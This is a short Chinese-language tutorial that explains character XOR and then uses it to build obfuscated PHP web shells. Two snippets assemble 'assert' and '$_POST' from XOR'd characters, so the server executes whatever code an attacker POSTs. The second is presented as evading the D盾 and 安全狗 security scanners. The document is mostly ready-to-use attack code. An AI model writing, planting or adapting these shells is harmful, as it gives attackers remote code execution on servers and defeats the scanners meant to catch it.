异或为
"x"^"q";

异或计算的过程是：
先把字符串转换为ASCII码，然后ASCII码转换成二进制，然后二进制进行异或，得到的异或结果转换为ASCII码在转换成字符串

ASCC->二进制->二进制异或得到结果->转换为ASCII码->转换为字符串

二进制异或规则：
1碰0=1
0碰1=1
其他都为0

例如
'A'^'?'

A的ASCII值是65，对应的二进制值是01000001

?的ASCII值是63，对应的二进制值是00111111

异或的二进制的值是01111110，对应的ASCII值是126，对应的字符串的值就是~了

实现一个马子：
<?php
$_0=("!"^"@").("3"^"@").("3"^"@").("%"^"@").("2"^"@").("4"^"@"); /*拼接出assert*/
#$_1=(hex2bin("64")^"@").(hex2bin("1F")^"@").(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@").(hex2bin("1B")^"@").(hex2bin('67')^"@").("!"^"@").(hex2bin('67')^"@").(hex2bin('1D')^"@"); /*拼接出_POST*/
$_1='_'.(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@"); /*$_POST*/
$_=$$_1;
$_0($_); /*assert($_POST[_])*/
?>


过D盾过安全狗的马子：
<?php
$_0=("!"^"@").("3"^"@").("3"^"@").("%"^"@").("2"^"@").("4"^"@"); /*assert*/
#$_1=(hex2bin("64")^"@").(hex2bin("1F")^"@").(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@").(hex2bin("1B")^"@").(hex2bin('67')^"@").("!"^"@").(hex2bin('67')^"@").(hex2bin('1D')^"@");
$_1='_'.(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@");
$_2=$$_1;
$_9=["admin"=>$_0($_2[_])];
?>

博客总结：https://422926799.github.io/2019/01/18/No-character-shell-study/
